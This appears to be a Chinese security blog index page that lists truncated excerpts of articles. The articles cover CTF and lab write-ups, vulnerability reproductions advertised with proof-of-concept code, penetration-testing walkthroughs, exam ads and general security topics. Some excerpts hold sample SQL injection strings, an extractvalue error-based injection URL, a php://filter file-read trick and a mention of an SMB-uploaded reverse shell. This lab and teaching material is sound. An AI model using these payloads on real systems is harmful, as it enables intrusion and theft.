dc9 扫描扫描结果如图 nmap 目录扫描指纹扫描渗透访问首页该处发现搜索框，正常搜名字可以直接返回该用户的信息，怀疑sql注入，使用单引号注入，发现没反应，再使用一下万能注入语句1 or 11 使用sqlmap sqlmap -…

敏感数据是什么？包含哪些？如何保障安全？

最近看到不少小伙伴在问，敏感数据是什么？包含哪些？如何保障安全？这里我们小编就给大家一一解答一下，仅供参考哦！ 敏感数据是什么？ 敏感数据，是指泄漏后可能会给社会或个人带来严重危…

文件上传漏洞实战getshell

目录 0x01 信息收集 0x02 寻找接口 0x03 拼接路径 0x04 权限 0x01 信息收集通过fofa，子域名收集等相关工具搜索域名定位到站点：htps://xx..edu.cn/x/xx/ 0x02 寻找接口通过f12寻找相关的js，发现有其他的页面 0x03 拼接路径 https://xx…

网安新旅程

网安新旅程将近四个月没发博客了，今天交代一下最近发生的事情和规划。 TryHackMyOffsecBox QQ交流君羊：751273347 近期的事情 6月开始我进入htb学院学习CPTS，7月左右我完成了95%左右的内容。7-8月份我基本都在做C#相关的开发&#xff0c…

[极客大挑战 2019]LoveSQL 1

题目环境：判断注入类型是否为数字型注入 admin 1 回显结果否是否为字符型注入 admin 1 回显结果是判断注入手法类型使用堆叠注入采用密码参数进行注入爆数据库1; show database();#回显结果这里猜测注入语句某字段被过滤，或者是’;被过滤导致不能…

Python武器库开发-常用模块之collections模块(十七)

常用模块之collections模块(十七) 除python提供的内置数据类型（int、float、str、list、tuple、dict）外，collections模块还提供了其他数据类型: 计数器（counter）有序字典（orderedDict）可命名元…

【网络管理——操作系统与安全】

文章目录一、安装WindowsServer操作系统1、新建虚拟机2、进入Windows虚拟机进行相关配置二、Windows用户账户管理与配置1、创建用户账户2、创建用户组三、Windows操作系统的本地安全策略设置1、配置用户账户密码策略2、配置用户账户锁定策略3、配置组策略安全选项4、配置审核…

$8月份NISP二级\CISP通过考试349人，其中NISP证书265人CISP证书84人$

8月份NISP二级\CISP通过考试349人，其中NISP证书265人CISP证书84人

8月份共有NISP二级265人，CISP证书84人通过考试长沙PER20230819HEBAN2 考试时间：2023年08月19日培训机构：网安世纪科技有限公司肖阳、李卓林、彭彦博、温庆航、胡泽涛、龚泽志、陈思、廖媛圆、肖晴、郭城、倪忠游、唐庭轩、王琪程、王博…

Discord将切换到临时文件链接以阻止恶意软件传播

导语 Discord是一个广受欢迎的社交平台，但其服务器长期以来一直是恶意活动的温床。为了解决这个问题，Discord决定采取行动，将切换到临时文件链接，以阻止恶意软件的传播。本文将介绍Discord的最新举措，并探讨其对用户安…

日防夜防，家贼难防？企业防泄密为什么这么难？

企业经营保密就是保生命，你知道吗？ 案例分析根据国家信息部门的报告显示，高达85%的数据泄密不是因为黑客工资有多厉害，而是由公司员工造成的。而且现在移动办公环境，大家都用手机在线办公软件的工作激励外泄更容易…

OSCP系列靶场-Esay-Dawn

总结 getwebshell → SMB共享无密码 → SMB存在上传功能 → 存在周期执行任务 → SMB上传反弹shell → 被执行获得webshell 提权思路 → suid发现zsh → -p容器提权准备工作启动VPN 获取攻击机IP > 192.168.45.163 启动靶机获取目标机器IP > 192.168.242.11 信…

【ATTCK】开源项目-mitreattack-python

mitreattack-python是用来处理ATT&CK数据的python开源工具。开源地址：GitHub - mitre-attack/mitreattack-python: A python module for working with ATT&CK 安装 pip3 install mitreattack-python #使用清华源pip3 install mitreattack-python -i http…

基于时间的盲注

XCTF刷题十一道（01）

文章目录 Training-WWW-RobotsPHP2unserialize3view-sourceget_postrobotsbackupcookiedisabled_buttonweak_authsimple_php Training-WWW-Robots robots.txt，防爬虫，访问urlrobots.txt PHP2 phps源码泄露 >phps文件就是php的源代码文件&#xff0…

通付盾Web3专题 | SharkTeam：Web3安全实践与创新

在Web3领域，安全漏洞、黑客攻击已愈发成为用户和投资者重点关注的领域。如何保障加密资产的安全，Web3黑暗森林中又有哪些新的攻击模式产生，SharkTeam将从一线进行分享和讨论。我们先来看一下2023年1月到8月的安全事件数量和损失的数据统计。…

DocCMS keyword SQL注入漏洞复现 [附POC]

文章目录 DocCMS keyword SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 DocCMS keyword SQL注入漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测…

CTFhub-RCE-过滤cat

文件格式猜测

001 实验内容 1.了解010Editor.exe的使用方法 2.了解文件格式的查看 3.判断文件的格式002 实验原理有些文件格式被设计用于存储特殊的数据， 例如： 图像文件中的JPEG文件格式仅用于存储静态的图像，而GIF既可以存储静态图像，也…

2023 金砖国家职业技能大赛网络安全省赛理论题样题（金砖国家未来技能挑战赛）

2023 金砖国家职业技能大赛网络安全省赛理论题样题（金砖国家未来技能挑战赛） 一、参加比赛的形式团队参与，每队2名选手（设队长1名）。二、项目项目阶段简介项目由四个阶段组成，将按顺序完成。向参与者…

金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]

文章目录金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议金蝶Apusic应用服务器deployApp接口任意文件上传漏洞复现 [附POC] 0x01 前言免责声明：…

金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞复现 [附POC]

文章目录金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议参考链接：金山终端安全系统V9.0 update_software_info_v2.php处SQL注入漏洞…

网络安全行业大模型调研总结

随着人工智能技术的发展，安全行业大模型SecLLM（security Large Language Model）应运而生，可应用于代码漏洞挖掘、安全智能问答、多源情报整合、勒索情报挖掘、安全评估、安全事件研判等场景。参考： 1、安全行业大模…

风控反欺诈安全学习路标

1. 金融和支付领域知识 - 了解金融和支付领域的基本概念、业务流程和风险特点。 - 学习金融机构的监管要求和合规措施，如KYC（了解你的客户）和AML（反洗钱）。 2. 数据分析和挖掘技术 - 学习数据分析和数据挖掘的基本原理…

青少年CTF-WEB-2048

题目环境： 针对这种游戏通关类题目，常见的有两种情况一、有参数改参数的数值达到题目规定的分数即可拿到flag 二、没有参数那么flag就是被编码了，找编码即可这道题并没有说题目通关即可获得flag，也并没有发现参数所以这里猜测f…

网站被攻击怎么办？

网站被大流量攻击会造成服务器资源耗尽，一直到宕机崩溃，网站无法访问甚至被机房停用，时间长就导致网站排名下降，所以必需及时处理。下面跟大家分享服务器被大流量攻击怎么办？服务器攻击防护如何做？ 一、服…

高防CDN如何预防攻击？

现在网络攻击事件越来越多，而且愈发凶猛，为了保障互联网业务能稳定正常的运行，市场上出现了很多高防产品，例如高防服务器、高防IP、高防CDN等等。其中究竟高防CDN怎么防攻击，能防哪些攻击？高防CDN如何实现防…

Metasploit使用指南

文章目录工具说明安装方法命令讲解show命令search搜索命令use命令info命令show命令run、exploit命令使用方法升级使用模块代理使用工具说明 Metasploit Framework(MSF) 是开源社区和 Rapid7 之间的合作,是一款开源安全漏洞检测工具，附带很多已知的软件漏洞&…

【网络安全】-网络安全的分类详解

文章目录介绍1. 网络层安全（Network Layer Security）理论实操使用VPN保护隐私 2. 应用层安全（Application Layer Security）理论实操使用密码管理器 3. 端点安全（Endpoint Security）理论实操定期更新防病毒…

SHCTF 山河CTF Reverse方向[Week1]全WP 详解

文章目录 [WEEK1]ez_asm[WEEK1]easy_re[WEEK1]seed[WEEK1]signin[WEEK1]easy_math[WEEK1]ez_apk [WEEK1]ez_asm 从上往下读，第一处是xor 1Eh，第二处是sub 0Ah；逆向一下先加0A后异或1E 写个EXP data "nhuo[M7mc7uhc$7midgbTf7$7%#ubf7 …

喜讯！云起无垠成为国家信息安全漏洞库（CNNVD）技术支撑单位

近日，云起无垠凭借其在漏洞挖掘、漏洞检测以及漏洞修复等领域的卓越表现，荣获“国家信息安全漏洞库（CNNVD）技术支撑单位等级证书（三级）”，正式成为CNNVD技术支撑单位。中国国家信息安全漏洞库&…

信息收集小练习

信息收集小练习本文章无任何恶意攻击行为，演示内容都合规无攻击性演示如何绕过cdn获取真实ip 使用多地ping该网站发现有很多ip地址，证明有cdn 此处使用搜索引擎搜索，得到ip 演示nmap工具的常用参数此处以testfire.net为例使用多地p…

BUUCTF [MRCTF2020]ezmisc 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。感谢Galaxy师傅供题。密文： 下载附件，解压得到.png图片。从这里也可以看出图片经过修改，无法正常显示。解题思路： 1、在010 E…

[极客大挑战 2019]Secret File1

[极客大挑战 2019]Secret File1 在bp里面发现secr3t.php 将secr3t.php 直接加在网站后面，发现了有关flag的信息，一个flag.php文件在遇到flag.php时候，联想到php伪协议，构造伪协议方式 secr3t.php?filephp://filter/readconver…

2023金盾杯线上赛-AGRT战队-WP

目录 WEB ApeCoin get_source ezupload easyphp MISC 来都来了芙宁娜 Honor Crypto 我看看谁还不会RSA hakiehs babyrsa PWN sign-format RE Re1 WEB ApeCoin 扫描发现有源码泄露，访问www.tar.gz得到源码。在源码中发现了冰蝎马。 Md5解码&am…

想成为网络安全工程师该如何学习？

一、网络安全应该怎么学？ 1.计算机基础需要过关这一步跟网安关系暂时不大，是进入it行业每个人都必须掌握的基础能力。计算机网络计算机操作系统算法与数据架构数据库 Tips:不用非要钻研至非常精通，可以与学习其他课程同步进行。 2.渗透技…

sso/单点认证的理解

目录模拟一下SSO/单点认证的识别过程。举例：1. 是什么？2. 为什么出现？3. 怎么做？4. 结果会怎样？5. SSO当前的实现方式一、基于Token的认证二、基于OAuth2.0的认证 6. 和普通的登录注册的区别模拟一下SSO/单点认证的识…

车联网安全相关标准汇总

以下是与车联网安全相关的国家标准的一些例子： 一. ISO/SAE 21434:2020 - 道路车辆网络及通信系统安全性 - 工程标准和管理指南 ISO/SAE 21434:2020是一项关于车辆网络和通信系统安全性的国际标准，由国际标准化组织（ISO）和Socie…

通达OA inc/package/down.php接口存在未授权访问漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一. 产品简介通达OA（Office Anywhere网络智能办公系统&am…

网络安全（黑客）——自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

2023年全国职业院校技能大赛“ 信息安全管理与评估” 测试题2

一.单选题 1、下列不属于口令安全威胁的是？（ ） A、弱口令 B、明文传输 C、 MD5 加密 D、多账户共用一个密码 2、在学校或单位如果发现自己的计算机感染了病毒,应首先采取什么措施 ( )。 A、断开网络 B、告知领导 C、杀毒 D、重…

禅道研发项⽬管理系统未授权RCE漏洞复现

1、产品介绍 Zendao禅道是第一款国产的开源项目管理软件，他的核心管理思想基于敏捷方法scrum，内置了产品管理和项目管理，同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能。 2、漏洞描述该系统在202…

SQLI手动注入和python sqlmap代码注入

sql教程： https://www.w3school.com.cn/sql/index.asp数据库： mysql oracle mssql常用方法 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 d…

【11.10】现代密码学1——密码学发展史：密码学概述、安全服务、香农理论、现代密码学

密码学发展史写在最前面密码学概述现代密码学量子密码学基本术语加解密的通信模型对称加密PKI通信工作流程古典密码与分析古代密码的加密古典密码的分析安全服务香农理论现代密码学乘积密码方案代换-置换网络安全性概念可证明安全性——规约（*规约证明的方案——…

Sectigo SSL

Sectigo（前身为ComodoCA）是全球在线安全解决方案提供商和全球最大的证书颁发机构。为了强调其在SSL产品之外的扩张，Comodo在2018年更名为Sectigo。新名称减少了市场混乱，标志着公司向创新的全方位网络安全解决方案提供商过渡。 S…

[BJDCTF2020]Easy MD5 1

题目环境： 尝试了SQL注入、命令执行等都不行点击提交并burp进行抓包Repeater进行重放这里看到了内置的SQL语句select * from admin where passwordmd5($pass,true) 发现传进去的值会进行md5加密这里看了大佬们的解释 ffifdyop绕过，绕过原理是&#xff…

免费群学习网络安全

免费学习网络安全!

desc相关注入

desc相关注入补充

2023年第十六届山东省职业院校技能大赛中职组“网络安全”赛项竞赛正式试题

第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题目录一、竞赛时间二、竞赛阶段三、竞赛任务书内容 （一）拓扑图 （二）A模块基础设施设置/安全加固（200分） （三&#xf…

[护网杯 2018]easy_tornado 1（两种解法！）

题目环境：发现有三个txt文本文件 /flag.txt/welcome.txt/hints.txt 依此点开 flag在/fllllllllllllag文件中在hints.txt文件中发现md5计算 md5(cookie_secretmd5(filename)) 并且三个文件中都存在filehash（文件名被哈希算法加密32位小写） 猜…

「NLP+网安」相关顶级会议期刊投稿注意事项+会议等级+DDL+提交格式

「NLP网安」相关顶级会议&期刊投稿注意事项写在最前面一、会议ACL (The Annual Meeting of the Association for Computational Linguistics)IH&MMSec (The ACM Workshop on Information Hiding, Multimedia and Security)CCS (The ACM Conference on Computer and Co…

IP代理识别API：预防欺诈和保护网络安全的必要工具

引言随着互联网的快速发展，我们的生活变得越来越依赖于网络。然而，随着网络的发展，网络犯罪和网络欺诈也在不断增加。为了保护自己的网站和客户免受网络欺诈的侵害，许多企业和组织开始使用IP代理识别API作为一种必要工具。什么…

[极客大挑战 2019]PHP 1

题目环境： 注意这四个字“备份网站”，让我想到了之前自己做网站的时候，有一次上传FTP网站文件，不小心把全部网站文件清空了，我伤心欲绝没有做网站备份文件，自此以后我就把网站文件在本地备份了一份&#xf…

【网络奇幻之旅】那年我与互联网的邂逅

🌺个人主页：Dawn黎明开始 🎀系列专栏：网络奇幻之旅 ⭐每日一句：不想留在过去，就要变得更好 📢欢迎大家：关注🔍点赞👍评论📝收藏⭐️ 文章目录 &a…

Windows SmartScreen中的漏洞！

🔥另一个流行漏洞是 CVE-2023-36025 - 绕过 Windows SmartScreen 安全功能，该功能是多个微软产品的网络钓鱼和恶意软件保护组件。 👾有多危险利用该漏洞，攻击者可以绕过 Windows Defender SmartScreen 检查和相关警告。利用该漏…

深信服AC密码认证（外部认证：LDAP认证）

拓扑图搭建好自己AD域服务器，我搭建的服务器域名叫做liyanlongyu.com，如何搭建这里我就不做演示了一.在AC中添加自己AD域服务器二.添加LDAP认证策略验证： 未认证发现，无法上网点击网页，弹出认证页面认证后&…

BUUCTF 黑客帝国 1

BUUCTF:https://buuoj.cn/challenges 题目描述： Jack很喜欢看黑客帝国电影，一天他正在上网时突然发现屏幕不受控制，出现了很多数据再滚屏，结束后留下了一份神秘的数据文件，难道这是另一个世界给Jack留下的信息&#…

基于时隙的多重冗余流指纹模型

文章信息论文题目：基于时隙的多重冗余流指纹模型期刊（会议）：网络与信息安全学报时间：2023 级别：CCF C 概述为确保内生网络流量安全可信，本文在研究流水印及其扩展的流指纹机制的基础上&a…

HCIA-RS基础-RIP路由协议

前言： RIP路由协议是一种常用的距离矢量路由协议，广泛应用于小规模网络中。本文将详细介绍RIP路由协议的两个版本：RIPv1和RIPv2，并介绍RIP的常用配置命令。通过学习本文，您将能够掌握RIP协议的基本原理、RIPv1和RIPv2的…

网络安全(黑客技术)—0基础小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

【漏洞复现】Array VPN任意文件读取漏洞

漏洞描述华耀（中国）科技有限公司（简称：Array）于2003年创建于北京，是优秀的网络功能平台解决方案提供商，也是应用交付解决方案、移动应用接入（SSL VPN）解决方案的全球领导者。华耀现有员工200余人，其中研发团队占到100余人，总部位于北京。并在北京、上海、广州、杭…

【华为数通HCIP | 网络工程师】821-IGP高频题、易错题之OSPF（7）

个人名片： 🐼作者简介：一名大三在校生，喜欢AI编程🎋 🐻‍❄️个人主页🥇：落798. 🐼个人WeChat：hmmwx53 🕊️系列专栏：🖼️…

解密 sqli靶场第一关：一步一步学习 SQL 注入技术

目录一、判断是否存在注入点二、构造类似?id1 --的语句三、判断数据表中的列数四、使用union联合查询五、使用group_concat()函数六、爆出数据库中的表名七、爆出users表中的列名八、爆出users表中的数据 🌈嗨！我是Filotimo__🌈。很…

Blender 连续 5 天遭受大规模 DDoS 攻击

Blender 发布公告指出，在2023年11月18日至23日期间，blender.org 网站遭受了持续的分布式拒绝服务（DDoS）攻击，攻击者通过不断发送请求导致服务器超载，使网站运营严重中断。此次攻击涉及数百个 IP 地址的僵尸…

【漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现

漏洞描述官方文档这样描述：OpenTSDB is a distributed, scalable Time Series Database (TSDB) written ontop of HBase；翻译过来就是，基于Hbase的分布式的，可伸缩的时间序列数据库。主要用途，就是做监控系统；譬如收集大规模集群（包括网络设备、操作系统、应用程序…

Couchdb 命令执行漏洞复现（CVE-2017-12636）

Couchdb 命令执行漏洞复现 （CVE-2017-12636） 1、下载couchdb.py 2、修改目标和反弹地址 3、Python3调用执行即可 couchdb.py文件下载地址: https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py ‍ 在VULFocus上开启环境 …

Linux 5.15安全特性之landlock

Landlock是一个在Linux内核中实现的安全模型，它允许进程在较低的特权级别下运行，并限制其对内核和系统资源的访问。它提供了一种细粒度的权限控制机制，可以用于创建沙盒环境和隔离敏感操作。 Landlock的实现基于eBPF（Extended Be…

2024年甘肃省职业院校技能大赛信息安全管理与评估赛项二三阶段样题一

2024年甘肃省职业院校技能大赛高职学生组电子与信息大类信息安全管理与评估赛项样题一第二阶段任务书任务描述随着网络和信息化水平的不断发展，网络安全事件也层出不穷，网络恶意代码传播、信息窃取、信息篡改、远程控制等各种网络攻击行为已严重…

服务器被入侵最简单明了解决方法

最直接的解决办法是立即关闭服务器，以防止攻击者继续损害系统。然后，应该尽快联系服务器商那边，确定攻击者的入侵方式，并采取措施来防止未来发生类似的入侵。此外，应该检查服务器上的所有文件，以确保攻击者…

暴力破解的基础知识和Burpsuite基础知识

定义暴力破解 (Brute Force)也称为字典攻击，通常被用于攻击网站的用户账户名/密码使用自动化脚本以枚举的方式尝试所有可能的用户名或密码组合。通过攻击用户的账户名和密码，窃取用户个人信息或获取网站管理权限等。暴力破解攻击产生原因 1、用户口…

SD-WAN组网方式详解

企业网络的演进势不可挡，对于高效、可靠的网络连接需求日益增加。SD-WAN（软件定义广域网）作为一项创新的网络技术，备受企业青睐并得到广泛应用。SD-WAN提供了多种灵活的组网方式，以满足企业多样化的需求和不同的网络环…

网络安全—部署CA证书服务器

文章目录网络拓扑安装步骤安装证书系统安装从属证书服务器申请与颁发申请证书CA颁发证书使用windows Server 2003环境网络拓扑两台服务器在同一网段即可，即能够互相ping通。安装步骤安装证书系统首先我们对计算机名进行确认，安装了证书系统后我…

长亭牧云主机管理助手——免费轻量的服务器管理软件初体验

优点安装十分简单，新手友好，一行命令搞定界面简洁，操作流畅无需公网 IP，可以面对复杂 NAT 环境进行救急可以统一管理大量主机，无需记住主机秘钥地址 https://rivers.chaitin.cn/app/collie 安装安装很简单&…

2023年广东省网络安全B模块（笔记详解）

模块B 网络安全事件响应、数字取证调查和应用安全一、项目和任务描述：假定你是某网络安全技术支持团队成员，某企业的服务器系统被黑客攻击，你的团队前来帮助企业进行调查并追踪本次网络攻击的源头，分析黑客的攻击方式，发现系统漏洞，提交网络安全事件响应报告，修复系统…

Apache Tomcat httpoxy 安全漏洞 CVE-2016-5388 已亲自复现

Apache Tomcat httpoxy 安全漏洞 CVE-2016-5388 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述在Apache Tomcat中发现了一个被归类为关键的漏洞，该漏洞在8.5.4(Application Server Soft ware)以下。受影响的是组…

【Java安全】Java反射机制-获取并调用类的成员方法

文章目录前言利用反射机制获取类的成员方法总结前言 Java反射(Reflection)是Java非常重要的动态特性，通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息，还可以动态创建Java类实例、调用任意的类方法、修改任意的…

【后端开发】后端跨域

package com.example.demo.config;import org.springframework.context.annotation.Configuration; import org.springframework.web.servlet.config.annotation.CorsRegistry; import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;/*** 后端实现跨域请…

2023年下半年计算机等级考试—信息安全三级部分真题

1.前言刚参加完2023年下半年计算机等级考试—信息安全三级。笔者凭借记忆将考到的题进行如下汇总，并整理正确答案。仅供各位参考！ 2.题型及分值上机考试，考试时长120分钟，满分100分。选择题 60分 50道题，每道题1.2分填空题 20分 20道题每道题1分综合应用题 2…

华为设备命令行操作基础

熟悉VRP命令行并且熟练掌握VRP配置是高效管理华为网络设备的必备基础。设备初始化启动管理员和工程师如果要访问在通用路由平台VRP上运行的华为产品，首先要进入启动程序。开机界面信息提供了系统启动的运行程序和正在运行的VRP版本及其加载路径。启动完成以后&am…

通达OA inc/package/down.php接口未授权访问漏洞复现 [附POC]

文章目录通达OA inc/package/down.php接口未授权访问漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议通达OA inc/package/down.php接口未授权访问漏洞复现 [附POC] 0x01 前言免责声明&#x…

web:[NPUCTF2020]ReadlezPHP

题目打开页面显示如下没发现其他的线索，查看源代码发现一个网址，访问这个页面查看进行代码审计这段代码是一个简单的 PHP 类，名为 HelloPhp。它有两个公共属性 $a 和 $b，并在构造函数中将它们分别初始化为字符串 "Y-m-…

【黑客】网络安全—小白自学笔记

一、网络安全应该怎么学？ 1.计算机基础需要过关这一步跟网安关系暂时不大，是进入it行业每个人都必须掌握的基础能力。计算机网络计算机操作系统算法与数据架构数据库 Tips:不用非要钻研至非常精通，可以与学习其他课程同步进行。 2.渗透技…

【ATTCK】MITRE Caldera 简介

一、什么是Caldera caldera是一个基于MITRE ATT&CK™构建的网络安全框架。其目标是创建一种工具，通过提供自动化安全评估来增强网络从业者的能力，从而节省用户的时间、金钱和精力。为此，需要几个关键组件才能使 Caldera 成为行业领先的平…

sqli-labs靶场详解less-24(二次注入)

less-24 对于一个像我一样的小白来说这关就像php代码审计一开始进行判断注入点的时候怎么都找不到一点思路都没有只能搜教程说是二次注入从来没遇见的题型于是从代码审计开始先说一下什么叫二次注入二次注入二次注入是指通过SQL语句存储到数据库的用户输入被读取后再次…

流量分析1--菜刀666

1：菜刀666： 题目描述分析流量包，过滤http数据流追踪TCP数据流对比第5个流和第7个流发现，同样的目录下多出了6666.jpg。猜测是由攻击者上传，直接在请求包里搜索FFD8--FFD9 保存为1.jpg 利用foremost工具对1.jpg进…

易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]

文章目录易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章…

web：NewsCenter

题目打开页面显示如下页面有个输入框，猜测是sql注入，即search为注入参数点，先尝试一下返回空白显示错误正常显示如下是因为单引号与服务端代码中的’形成闭合，输入的字符串hello包裹，服务端代码后面多出来一个‘导…

鸿运主动安全监控云平台存在任意文件读取漏洞附POC

@[toc] 鸿运主动安全监控云平台存在任意文件读取漏洞附POC 免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途…

BUUCTF [ACTF新生赛2020]NTFS数据流 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件，得到一个.tar文件。解题思路： 1、解压.tar文件，再解压tmp文件夹下的flag.rar文件，得到500个.txt文件…

2024年江苏省职业院校技能大赛信息安全管理与评估第二阶段学生组（样卷）

2024年江苏省职业院校技能大赛信息安全管理与评估第二阶段学生组（样卷） 竞赛项目赛题本文件为信息安全管理与评估项目竞赛-第二阶段样题，内容包括：网络安全事件响应、数字取证调查、应用程序安全。本次比赛时间为180分钟。 …

西工大网络空间安全学院计算机系统基础实验一（45678）

接着来看第4个函数，int replaceByte(int x, int n, int c)，看题目给出的例子，replaceByte(0x12345678,1,0xab) 0x1234ab78。我们可以多写几个例子，进而找出规律，比如： replaceByte(0x12345678,2,0xab) 0…

【网络安全】-安全常见术语介绍

文章目录介绍1. 防火墙（Firewall）定义通俗解释 2. 恶意软件（Malware）定义通俗解释 3. 加密（Encryption）定义通俗解释 4. 多因素认证（Multi-Factor Authentication，MFA）定…

2023年全国职业院校技能大赛“ 信息安全管理与评估” 测试题

一、单选题 （ 每题 2 2 分 ，共共 5 35 题，共共 0 70 分） 1、( )是指在信息的采集、加工、存储、传播和利用的各个环节中，用来规范期间产生的各种社会关系的道德意识、道德规范和道德行为的总和。 A、信息规范 …

渗透测试|HW蓝队

公众号：老油条运维记录某个对某个钓鱼事件中获取的钓鱼样本进行分析，以及简单的制作学习样本行为分析首先看到是 qq 邮箱发来的某个压缩包大概本身是带密码的，反手就丢到虚拟机先看下大概文件，解压后是这样的一个快捷方式然…

APT攻击检测可用的数据集大全

APT攻击检测可用的数据集大全一、StreamSpot数据集二、DARPA TC 数据集三、Unicorn SC - 2 数据集四、CCCS-CIC-AndMal-2020 高级长期威胁（英语：Advanced Persistent Threat，缩写：APT），又称高级持续性威胁…

警方打击了大规模网络钓鱼提供商BulletProftLink

导语最近，马来西亚皇家警察宣布成功打击了一个名为BulletProftLink的大规模网络钓鱼提供商。这个提供超过300个钓鱼模板的平台被查封，给全球网络安全带来了巨大的利好消息。本文将带您了解这个引人注目的行动背后的故事，并揭示BulletProftLi…

安全运维：cmd命令大全（108个）

1、calc：启动计算器 2、appwiz.cpl：程序和功能 3、certmgr.msc：证书管理实用程序 4、charmap：启动字符映射表 5、chkdsk.exe：Chkdsk磁盘检查(管理员身份运行命令提示符) 6、cleanmgr: 打开磁盘清理工具 7、clico…

sqli-labs(Less-4) extractvalue闯关

extractvalue() - Xpath类型函数 1. 确认注入点如何闭合的方式 2. 爆出当前数据库的库名 http://127.0.0.1/sqlilabs/Less-4/?id1") and extractvalue(1,concat(~,(select database()))) --3. 爆出当前数据库的表名 http://127.0.0.1/sqlilabs/Less-4/?id1") …

网络安全（黑客技术）/小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

反序列化漏洞(二)

目录 pop链前置知识，魔术方法触发规则 pop构造链解释（开始烧脑了） 字符串逃逸基础字符减少字符串逃逸基础字符增加实例获取flag 字符串增多逃逸字符串减少逃逸延续反序列化漏洞(一)的内容 pop链前置知识，魔术方法触…

AURIX TC芯片中DSU实现安全启动

AURIX TC芯片中的DSU（Digital Signature Unit）是用于实现安全启动机制的关键模块。它负责对引导代码进行签名验证和核实，确保系统从可信源启动，防止恶意软件的植入和篡改。 DSU模块的主要功能包括： 1. 数字签名验证&…

bad_python

攻防世界 (xctf.org.cn) 前戏下载文件，解压完成后是这个一个pyc文件这里要用到python的反编译要用到的工具有两个 1.python自带的uncompyle6 2.pycdc文件——比uncompyle6强大一点我们一个一个来尝试一下 uncompyle6： 我是直接在pycharm里面…

用友NC word.docx接口存在任意文件读取漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、产品介绍用友 NC Cloud，大型企业数字化平台&#xff…

CISP攻防界四大顶流，无门槛高收益，错过太可惜了

根据《2022年中国网络安全行业白皮书》中显示，2022年我国网安人才缺口达到了50万人左右，2023年只多不减。其中核心技术人才尤其稀缺。随着国家对网络安全的重视，企业对于有网络安全专业背景和相关资质的人才需求越来越大，而攻防…

西工大计算机学院计算机系统基础实验一（函数编写1~10）

还是那句话，千万不要慌，千万不要着急，耐下性子慢慢来，一步一个脚印，把基础打的牢牢的，一样不比那些人差。回到实验本身，自从按照西工大计算机学院计算机系统基础实验一（…

速达软件全系产品任意文件上传漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。 1. 速达软件产品简介速达软件专注中小企业管理软件,产品涵盖进销存软…

【网络奇缘】- 计算机网络|分层结构|深入学习ISO模型

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 回顾链接：http://t.csdnimg.cn/nRRzR 这篇文章是关于深入学习OSI模型七层结构， “书山…

2023 金砖国家职业技能大赛网络安全省赛二三阶段样题（金砖国家未来技能挑战赛）

2023 金砖国家职业技能大赛网络安全省赛二三阶段样题（金砖国家未来技能挑战赛） 第二阶段： 安全运营 **背景：**作为信息安全技术人员必须能够掌握操作系统加固与安全管控、防火墙一般配置、常见服务配置等相关技能，利…

软件开发安全指南

